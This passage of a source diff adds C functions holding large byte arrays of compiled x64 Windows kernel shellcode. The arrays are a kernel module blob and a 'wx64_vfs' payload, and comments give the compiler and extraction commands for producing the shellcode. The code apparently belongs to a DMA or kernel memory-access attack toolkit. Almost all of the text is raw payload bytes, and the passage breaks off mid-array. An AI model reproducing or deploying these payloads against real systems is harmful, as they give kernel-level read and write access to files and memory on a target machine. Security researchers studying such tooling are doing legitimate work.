+		0xe8, 0x23, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xa0, 0x00, 0x00,
+		0x00, 0x49, 0x8b, 0x5b, 0x30, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0x7b,
+		0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
+		0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c,
+		0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
+		0xd9, 0x48, 0xc7, 0x44, 0x24, 0x40, 0xf0, 0xd8, 0xff, 0xff, 0xb9, 0x00,
+		0x00, 0x00, 0x01, 0x41, 0xbe, 0xff, 0xff, 0xff, 0xff, 0x33, 0xed, 0x41,
+		0x8b, 0xd6, 0x8b, 0xf5, 0x48, 0x89, 0x4b, 0x18, 0xff, 0x93, 0x10, 0x03,
+		0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0xb9, 0x00,
+		0x00, 0x40, 0x00, 0x41, 0x8b, 0xd6, 0x48, 0x89, 0x4b, 0x18, 0xff, 0x93,
+		0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x12,
+		0xb8, 0x01, 0x00, 0x00, 0xf0, 0x48, 0x89, 0x6b, 0x18, 0x48, 0x89, 0x43,
+		0x30, 0xe9, 0xae, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0x48, 0x89, 0x7b,
+		0x28, 0xff, 0x93, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0x43, 0x20, 0x41,
+		0xbe, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x83, 0xf8, 0x0f, 0x00, 0x00,
+		0x4c, 0x89, 0x73, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x23, 0x49, 0x03, 0xf6,
+		0x48, 0xb8, 0x00, 0xe4, 0x0b, 0x54, 0x02, 0x00, 0x00, 0x00, 0x48, 0x3b,
+		0xf0, 0x76, 0xde, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x33, 0xd2, 0x33, 0xc9,
+		0xff, 0x93, 0x50, 0x03, 0x00, 0x00, 0xeb, 0xcd, 0x48, 0xc7, 0x43, 0x30,
+		0x02, 0x00, 0x00, 0x00, 0x48, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x2a, 0x01,
+		0x00, 0x00, 0x48, 0x83, 0xf8, 0x04, 0x75, 0x4c, 0xff, 0x93, 0x20, 0x03,
+		0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x06, 0x48, 0x89,
+		0x6b, 0x38, 0xeb, 0x38, 0x4c, 0x8b, 0xc5, 0x48, 0x39, 0x28, 0x75, 0x06,
+		0x48, 0x39, 0x68, 0x08, 0x74, 0x09, 0x4d, 0x03, 0xc6, 0x48, 0x83, 0xc0,
+		0x10, 0xeb, 0xec, 0x49, 0xc1, 0xe0, 0x04, 0x48, 0x8b, 0xd6, 0x48, 0x8b,
+		0xcf, 0x4c, 0x89, 0x43, 0x48, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x48,
+		0x8b, 0xce, 0xff, 0x93, 0x00, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73, 0x38,
+		0x48, 0x83, 0xbb, 0xf8, 0x0f, 0x00, 0x00, 0x05, 0x75, 0x18, 0x48, 0x8b,
+		0xcb, 0x48, 0x39, 0xab, 0x68, 0x01, 0x00, 0x00, 0x74, 0x05, 0xff, 0x53,
+		0x60, 0xeb, 0x03, 0xff, 0x53, 0x58, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x8b,
+		0x83, 0xf8, 0x0f, 0x00, 0x00, 0x49, 0x2b, 0xc6, 0x49, 0x3b, 0xc6, 0x77,
+		0x5a, 0x48, 0x39, 0xab, 0x68, 0x01, 0x00, 0x00, 0x74, 0x4d, 0x48, 0x8b,
+		0x53, 0x48, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0x4b, 0x40, 0xff, 0x93, 0x28,
+		0x03, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x34, 0x4c,
+		0x8b, 0x43, 0x48, 0x4c, 0x39, 0xb3, 0xf8, 0x0f, 0x00, 0x00, 0x75, 0x08,
+		0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcf, 0xeb, 0x06, 0x48, 0x8b, 0xd7, 0x48,
+		0x8b, 0xce, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x53, 0x48,
+		0x48, 0x8b, 0xce, 0xff, 0x93, 0x30, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73,
+		0x38, 0xeb, 0x04, 0x48, 0x89, 0x6b, 0x38, 0x48, 0x83, 0xbb, 0xf8, 0x0f,
+		0x00, 0x00, 0x06, 0x75, 0x15, 0x4c, 0x8b, 0x43, 0x48, 0x48, 0x8b, 0xcf,
+		0x48, 0x8b, 0x53, 0x40, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x4c, 0x89,
+		0x73, 0x38, 0x48, 0x83, 0xbb, 0xf8, 0x0f, 0x00, 0x00, 0x07, 0x75, 0x15,
+		0x4c, 0x8b, 0x43, 0x48, 0x48, 0x8b, 0xd7, 0x48, 0x8b, 0x4b, 0x40, 0xff,
+		0x93, 0x40, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x89, 0xab,
+		0xf8, 0x0f, 0x00, 0x00, 0x48, 0x8b, 0xf5, 0xe9, 0x91, 0xfe, 0xff, 0xff,
+		0xb8, 0x00, 0x00, 0x00, 0xf0, 0x48, 0x8b, 0xcf, 0x48, 0x89, 0x43, 0x30,
+		0xff, 0x93, 0x08, 0x03, 0x00, 0x00, 0x48, 0x89, 0x6b, 0x20, 0x48, 0x89,
+		0x6b, 0x28, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x89, 0x2b, 0x48, 0x89, 0xab,
+		0xf8, 0x0f, 0x00, 0x00, 0x48, 0x8b, 0x5c, 0x24, 0x48, 0x48, 0x8b, 0x6c,
+		0x24, 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5e, 0x5f, 0x5e, 0xc3
+	};
+	*ppb = WINX64_KMD_BIN;
+	*pcb = sizeof(WINX64_KMD_BIN);
+}
+
+// standard wx64_vfs payload, compile and extract shellcode with:
+// 
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_vfs.c
+// ml64 wx64_common_a.asm /Fewx64_vfs.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_vfs.obj wx64_common.obj
+// shellcode64.exe -o wx64_vfs.exe
+// xxd -i wx64_vfs.bin
+VOID GetData_VFS(PBYTE *ppb, PDWORD pcb)
+{
+	BYTE WINX64_VFS_BIN[] = {
+		0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20,
+		0xe8, 0xb7, 0x06, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3, 0x0f, 0x20,
+		0xd8, 0xc3, 0x0f, 0x09, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+		0x08, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x55, 0x48, 0x8d, 0x6c, 0x24, 0xa9,
+		0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00,
+		0x48, 0x8d, 0x4d, 0x17, 0x48, 0x8b, 0xfa, 0x49, 0x8b, 0xd8, 0xba, 0x10,
+		0x00, 0x00, 0x00, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0xba, 0x30, 0x00,
+		0x00, 0x00, 0x48, 0x8d, 0x4d, 0x27, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
+		0x48, 0x8d, 0x93, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff,
+		0x57, 0x78, 0x83, 0x64, 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48,
+		0x83, 0x64, 0x24, 0x48, 0x00, 0x4c, 0x8d, 0x4d, 0x17, 0x48, 0x83, 0x65,
+		0x2f, 0x00, 0x4c, 0x8d, 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00,
+		0x00, 0x00, 0x48, 0x8d, 0x4d, 0x6f, 0x48, 0x89, 0x45, 0x37, 0x0f, 0x57,
+		0xc0, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x27, 0x30, 0x00,
+		0x00, 0x00, 0x89, 0x44, 0x24, 0x38, 0xba, 0x00, 0x00, 0x00, 0x80, 0x89,
+		0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48,
+		0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0xc7, 0x45, 0x3f, 0x40, 0x02, 0x00,
+		0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00,
+		0x48, 0x8b, 0x4d, 0x6f, 0x8b, 0xd8, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff,
+		0x97, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00,
+		0x00, 0x8b, 0xc3, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x7b, 0x20, 0x49,
+		0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x7c,
+		0x24, 0x18, 0x55, 0x48, 0x8d, 0x6c, 0x24, 0xa9, 0x48, 0x81, 0xec, 0xb0,
+		0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00, 0x48, 0x8d, 0x4d, 0x17,
+		0x48, 0x8b, 0xfa, 0x49, 0x8b, 0xd8, 0xba, 0x10, 0x00, 0x00, 0x00, 0xff,
+		0x97, 0x80, 0x00, 0x00, 0x00, 0xba, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+		0x4d, 0x27, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x1c,
+		0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x57, 0x78, 0x83, 0x64,
+		0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x83, 0x64, 0x24, 0x48,
+		0x00, 0x4c, 0x8d, 0x4d, 0x17, 0x48, 0x83, 0x65, 0x2f, 0x00, 0x4c, 0x8d,
+		0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x48, 0x8d,
+		0x4d, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x57,
+		0xc0, 0xc7, 0x44, 0x24, 0x30, 0x04, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
+		0x00, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83,
+		0x64, 0x24, 0x20, 0x00, 0x48, 0xc7, 0x45, 0x27, 0x30, 0x00, 0x00, 0x00,
+		0x48, 0xc7, 0x45, 0x3f, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0x37,
+		0xf3, 0x0f, 0x7f, 0x45, 0x47, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00, 0x48,
+		0x8b, 0x4d, 0x6f, 0x8b, 0xd8, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97,
+		0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00,
+		0x8b, 0xc3, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x7b, 0x20, 0x49, 0x8b,
+		0xe3, 0x5d, 0xc3, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x10, 0x48,
+		0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x55, 0x41, 0x54, 0x41, 0x55,
+		0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0xb0,
+		0x00, 0x00, 0x00, 0x33, 0xc0, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0x89, 0x10,
+		0x02, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x89, 0x45, 0x67, 0x4c, 0x8b,
+		0xfa, 0x44, 0x8b, 0xf0, 0x48, 0x81, 0xf9, 0x00, 0x00, 0x20, 0x00, 0x73,
+		0x0a, 0xb8, 0x07, 0x00, 0x00, 0xf0, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4c,
+		0x8b, 0x63, 0x28, 0x48, 0x81, 0xc1, 0x00, 0x00, 0xf0, 0xff, 0x4c, 0x03,
+		0xa3, 0x08, 0x02, 0x00, 0x00, 0x48, 0xb8, 0x8f, 0xe3, 0x38, 0x8e, 0xe3,
+		0x38, 0x8e, 0xe3, 0x48, 0xf7, 0xe1, 0x48, 0x8d, 0x4d, 0xe7, 0x4c, 0x8b,
+		0xea, 0xba, 0x10, 0x00, 0x00, 0x00, 0x49, 0xc1, 0xed, 0x09, 0x41, 0xff,
+		0x97, 0x80, 0x00, 0x00, 0x00, 0xbe, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+		0x4d, 0x07, 0x8b, 0xd6, 0x41, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48,
+		0x8d, 0x97, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xf7, 0x41, 0xff,
+		0x57, 0x78, 0x4c, 0x21, 0x75, 0x0f, 0x48, 0x8d, 0x45, 0xf7, 0x0f, 0x57,
+		0xc0, 0xc7, 0x44, 0x24, 0x28, 0x21, 0x40, 0x00, 0x00, 0x4c, 0x8d, 0x4d,
+		0xe7, 0x48, 0x89, 0x45, 0x17, 0x4c, 0x8d, 0x45, 0x07, 0x48, 0x89, 0x75,
+		0x07, 0xba, 0x01, 0x00, 0x10, 0x00, 0x48, 0xc7, 0x45, 0x1f, 0x40, 0x02,
+		0x00, 0x00, 0x48, 0x8d, 0x4d, 0x67, 0xc7, 0x44, 0x24, 0x20, 0x03, 0x00,
+		0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x27, 0x41, 0xff, 0x97, 0x98, 0x00,
+		0x00, 0x00, 0x33, 0xd2, 0x8b, 0xf8, 0x85, 0xc0, 0x0f, 0x85, 0x01, 0x01,
+		0x00, 0x00, 0xc6, 0x44, 0x24, 0x50, 0x01, 0xe9, 0x96, 0x00, 0x00, 0x00,
+		0x48, 0x39, 0x55, 0xef, 0x0f, 0x84, 0xed, 0x00, 0x00, 0x00, 0xba, 0x40,
+		0x02, 0x00, 0x00, 0x49, 0x8b, 0xcc, 0x41, 0xff, 0x97, 0x80, 0x00, 0x00,
+		0x00, 0x48, 0x8b, 0x46, 0x28, 0x48, 0x8d, 0x56, 0x5e, 0x49, 0x89, 0x44,
+		0x24, 0x30, 0x48, 0x8b, 0x46, 0x10, 0x49, 0x89, 0x44, 0x24, 0x08, 0x48,
+		0x8b, 0x46, 0x08, 0x49, 0x89, 0x44, 0x24, 0x18, 0x48, 0x8b, 0x46, 0x20,
+		0x49, 0x83, 0x0c, 0x24, 0x10, 0x49, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46,
+		0x38, 0x24, 0x10, 0xf6, 0xd8, 0x48, 0x1b, 0xc9, 0x48, 0xf7, 0xd9, 0x48,
+		0xff, 0xc1, 0x49, 0x09, 0x0c, 0x24, 0xb9, 0x03, 0x01, 0x00, 0x00, 0x8b,
+		0x46, 0x3c, 0x3b, 0xc1, 0x0f, 0x47, 0xc1, 0x49, 0x8d, 0x4c, 0x24, 0x38,
+		0x44, 0x8b, 0xc0, 0x41, 0xff, 0x57, 0x60, 0x33, 0xd2, 0x49, 0x81, 0xc4,
+		0x40, 0x02, 0x00, 0x00, 0x49, 0xff, 0xc6, 0x4d, 0x3b, 0xf5, 0x73, 0x73,
+		0x8b, 0x06, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x03, 0xf0, 0xe9, 0x78, 0xff,
+		0xff, 0xff, 0x88, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x8d,
+		0x45, 0xe7, 0x48, 0x03, 0x8b, 0x10, 0x02, 0x00, 0x00, 0x45, 0x33, 0xc9,
+		0x48, 0x8b, 0xb3, 0x08, 0x02, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x48, 0x89,
+		0x54, 0x24, 0x48, 0x48, 0x81, 0xc6, 0x00, 0x00, 0xf0, 0xff, 0x88, 0x54,
+		0x24, 0x40, 0x48, 0x03, 0xf1, 0x48, 0x8b, 0x4d, 0x67, 0x48, 0xc7, 0x44,
+		0x24, 0x38, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00,
+		0x10, 0x00, 0x48, 0x89, 0x74, 0x24, 0x28, 0x48, 0x89, 0x44, 0x24, 0x20,
+		0x41, 0xff, 0x97, 0xa0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x8b, 0xf8, 0x85,
+		0xc0, 0x0f, 0x84, 0x09, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x4d, 0x67, 0x4b,
+		0x8d, 0x04, 0xf6, 0x48, 0xc1, 0xe0, 0x06, 0x48, 0x89, 0x83, 0x00, 0x02,
+		0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x09, 0x41, 0xff, 0x97, 0x88, 0x00,
+		0x00, 0x00, 0x33, 0xd2, 0x4d, 0x85, 0xf6, 0x0f, 0x45, 0xfa, 0x8b, 0xc7,
+		0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
+		0x49, 0x8b, 0x73, 0x40, 0x49, 0x8b, 0x7b, 0x48, 0x49, 0x8b, 0xe3, 0x41,
+		0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
+		0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x18, 0x55, 0x57,
+		0x41, 0x56, 0x48, 0x8d, 0x6c, 0x24, 0xb9, 0x48, 0x81, 0xec, 0xb0, 0x00,
+		0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+		0xf1, 0xbb, 0x30, 0x00, 0x00, 0x00, 0x8b, 0xd3, 0x48, 0x8d, 0x4d, 0x17,
+		0x4d, 0x8b, 0xf0, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x53, 0xe0,
+		0x48, 0x8d, 0x4d, 0xf7, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x49, 0x8d,
+		0x96, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x57, 0x78,
+		0x83, 0x64, 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x83, 0x64,
+		0x24, 0x48, 0x00, 0x4c, 0x8d, 0x4d, 0xf7, 0x48, 0x83, 0x65, 0x1f, 0x00,
+		0x4c, 0x8d, 0x45, 0x17, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00, 0x00, 0x00,
+		0x48, 0x8d, 0x4d, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x01, 0x00, 0x00, 0x00,
+		0x0f, 0x57, 0xc0, 0xc7, 0x44, 0x24, 0x30, 0x03, 0x00, 0x00, 0x00, 0xba,
+		0x00, 0x00, 0x00, 0x80, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00,
+		0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x89, 0x5d, 0x17, 0x48, 0xc7,
+		0x45, 0x2f, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0x27, 0xf3, 0x0f,
+		0x7f, 0x45, 0x37, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85,
+		0xc0, 0x75, 0x59, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00, 0x49, 0x8d, 0x86,
+		0x28, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8e, 0x08, 0x02, 0x00, 0x00, 0x45,
+		0x33, 0xc9, 0x48, 0x03, 0x4e, 0x28, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x44,
+		0x24, 0x38, 0x33, 0xd2, 0x41, 0x8b, 0x86, 0x30, 0x03, 0x00, 0x00, 0x89,
+		0x44, 0x24, 0x30, 0x48, 0x8d, 0x45, 0xf7, 0x48, 0x89, 0x4c, 0x24, 0x28,
+		0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x97, 0xb8,
+		0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75, 0x0b, 0x48, 0x8b, 0x45,
+		0xff, 0x48, 0x89, 0x86, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x6f,
+		0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x4c,
+		0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xc3, 0x49, 0x8b, 0x5b,
+		0x20, 0x49, 0x8b, 0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5e, 0x5f, 0x5d,
+		0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+		0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1,
+		0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00,
+		0x48, 0x8d, 0x4d, 0x27, 0x48, 0x8b, 0xf2, 0xbf, 0x30, 0x00, 0x00, 0x00,
+		0x8b, 0xd7, 0x49, 0x8b, 0xd8, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x8d,
+		0x57, 0xe0, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00,
+		0x48, 0x8d, 0x93, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x17, 0xff,
+		0x56, 0x78, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8d, 0x45, 0x17, 0x48, 0x83,
+		0x65, 0x2f, 0x00, 0x0f, 0x57, 0xc0, 0x48, 0x89, 0x45, 0x37, 0x8a, 0xc1,
+		0x24, 0x80, 0x48, 0x89, 0x7d, 0x27, 0xf6, 0xd8, 0x48, 0xc7, 0x45, 0x3f,
+		0x40, 0x02, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0x1b, 0xd2, 0x81,
+		0xe2, 0x04, 0x00, 0x00, 0xc0, 0x81, 0xc2, 0x00, 0x00, 0x00, 0x40, 0xf6,
+		0xc1, 0x40, 0x74, 0x0d, 0x48, 0x83, 0xbb, 0x28, 0x03, 0x00, 0x00, 0x00,
+		0x8d, 0x47, 0xd5, 0x74, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x83, 0x64,
+		0x24, 0x50, 0x00, 0x4c, 0x8d, 0x4d, 0x07, 0x48, 0x83, 0x64, 0x24, 0x48,
+		0x00, 0x4c, 0x8d, 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00, 0x00,
+		0x00, 0x48, 0x8d, 0x4d, 0x6f, 0x89, 0x44, 0x24, 0x38, 0x83, 0x64, 0x24,
+		0x30, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83,
+		0x64, 0x24, 0x20, 0x00, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x8b, 0xf8,
+		0x85, 0xc0, 0x75, 0x45, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00, 0x48, 0x8d,
+		0x83, 0x28, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8d,
+		0x8b, 0x38, 0x03, 0x00, 0x00, 0x8b, 0x83, 0x30, 0x03, 0x00, 0x00, 0x45,
+		0x33, 0xc9, 0x89, 0x44, 0x24, 0x30, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x4c,
+		0x24, 0x28, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x8b, 0x4d, 0x6f, 0x33, 0xd2,
+		0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x8b,
+		0xf8, 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x96,
+		0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00,
+		0x8b, 0xc7, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b,
+		0x7b, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x81,
+		0xec, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x48, 0x8d, 0x54, 0x24,
+		0x20, 0x48, 0x8b, 0x49, 0x08, 0xe8, 0xba, 0x00, 0x00, 0x00, 0x4c, 0x8b,
+		0x83, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x03, 0x43, 0x28, 0x48, 0x81, 0xbb,
+		0x00, 0x01, 0x00, 0x00, 0x38, 0x03, 0x00, 0x00, 0x0f, 0x82, 0x86, 0x00,
+		0x00, 0x00, 0x48, 0xb8, 0x0f, 0x13, 0xaa, 0x93, 0xad, 0x20, 0xe7, 0x79,
+		0x49, 0x39, 0x00, 0x75, 0x77, 0x49, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xf8,
+		0x01, 0x75, 0x19, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8,
+		0xc0, 0xfa, 0xff, 0xff, 0x48, 0x63, 0xc8, 0x48, 0x89, 0x8b, 0x20, 0x02,
+		0x00, 0x00, 0xeb, 0x60, 0x48, 0x83, 0xf8, 0x03, 0x75, 0x0f, 0x48, 0x8d,
+		0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0xe9, 0xfc, 0xff, 0xff, 0xeb,
+		0xdf, 0x48, 0x83, 0xf8, 0x02, 0x75, 0x0f, 0x48, 0x8d, 0x54, 0x24, 0x20,
+		0x48, 0x8b, 0xcb, 0xe8, 0x1c, 0xfe, 0xff, 0xff, 0xeb, 0xca, 0x48, 0x83,
+		0xf8, 0x04, 0x75, 0x0f, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb,
+		0xe8, 0xb3, 0xf8, 0xff, 0xff, 0xeb, 0xb5, 0x48, 0x83, 0xf8, 0x05, 0x75,
+		0x1b, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0x7e, 0xf9,
+		0xff, 0xff, 0xeb, 0xa0, 0xb8, 0x01, 0x00, 0x00, 0xc0, 0x48, 0x89, 0x83,
+		0x20, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xf0, 0x00, 0x00, 0x00, 0x5b,
+		0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+		0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c, 0x89, 0x70, 0x20, 0x55,
+		0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90, 0x00, 0x00, 0x00, 0x4c,
+		0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b, 0xd7, 0xc7, 0x45, 0xeb,
+		0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8, 0x00, 0x00, 0x00, 0xc7,
+		0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d, 0x75, 0x4b, 0xc7, 0x45,
+		0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00, 0x00, 0x00, 0xc7, 0x45,
+		0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb, 0xce, 0xad, 0x90, 0x4d,
+		0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7, 0x45, 0x03, 0x8f, 0xb5,
+		0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd, 0x05, 0xc7, 0x45, 0x0b,
